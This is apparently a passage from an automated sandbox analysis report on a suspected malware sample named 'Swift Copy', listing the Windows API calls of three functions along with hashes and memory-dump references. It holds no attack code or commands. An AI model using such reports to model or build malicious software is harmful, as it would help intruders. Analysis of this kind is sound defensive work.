                                              • Opcode Fuzzy Hash: 00d67c6c8c505af702d809f9f4e9b016fa41b32af963e1267bcb2dc6023991c2
                                              • Instruction Fuzzy Hash: 49D012A1C0810AE9CB50A7D0CC49EBAF3BDEB09301F608476F886A3040E634D549AB75
                                              APIs
                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E0236C
                                              • PostMessageW.USER32(00000000), ref: 00E02373
                                                • Part of subcall function 00DDE97B: Sleep.KERNEL32 ref: 00DDE9F3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: FindMessagePostSleepWindow
                                              • String ID: Shell_TrayWnd
                                              • API String ID: 529655941-2988720461
                                              • Opcode ID: 71be0cf9695f99dd47e54d42c614fe840bb4c741e1fd9c6d76b271035b1eb5c1
                                              • Instruction ID: 4d3af081fbd4a065aa25be749f960d1a4cac803fac925dd38725a8d0e58d89db
                                              • Opcode Fuzzy Hash: 71be0cf9695f99dd47e54d42c614fe840bb4c741e1fd9c6d76b271035b1eb5c1
                                              • Instruction Fuzzy Hash: B8D0C9763813107BE668B771AC0FFC66A189B04B14F604A167645BA1E4C9A1A845CA65
                                              APIs
                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E0232C
                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00E0233F
                                                • Part of subcall function 00DDE97B: Sleep.KERNEL32 ref: 00DDE9F3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: FindMessagePostSleepWindow
                                              • String ID: Shell_TrayWnd
                                              • API String ID: 529655941-2988720461
                                              • Opcode ID: f80b732f3ec69178357246cf51e18d30ae6254faa979d7bb702fe7fc26d13c50
                                              • Instruction ID: c368c966bc8c0d78c41e3197aad27dde8fc74cf122dea82e7fcf81036efbf9bc
                                              • Opcode Fuzzy Hash: f80b732f3ec69178357246cf51e18d30ae6254faa979d7bb702fe7fc26d13c50
                                              • Instruction Fuzzy Hash: C4D01276395310BBE678B771EC1FFC67A18DB00B14F204A177745BA1E4C9F1A845CA64
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00DABE93
                                              • GetLastError.KERNEL32 ref: 00DABEA1
                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00DABEFC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide$ErrorLast
                                              • String ID:
                                              • API String ID: 1717984340-0
                                              • Opcode ID: 4e5008fa866826015ce28cf34d584b0a94efeba174db812c27f218642d8a4ebd
                                              • Instruction ID: ed45a3eccacf7b44a2d74a0a42f07cbeb8b310c9b6dcaf1538b0d39dacdfed1a
                                              • Opcode Fuzzy Hash: 4e5008fa866826015ce28cf34d584b0a94efeba174db812c27f218642d8a4ebd
                                              • Instruction Fuzzy Hash: F941D834605246AFCF218F65CC54ABA7BA5DF43330F1C426AF959971A2DB328D02CB70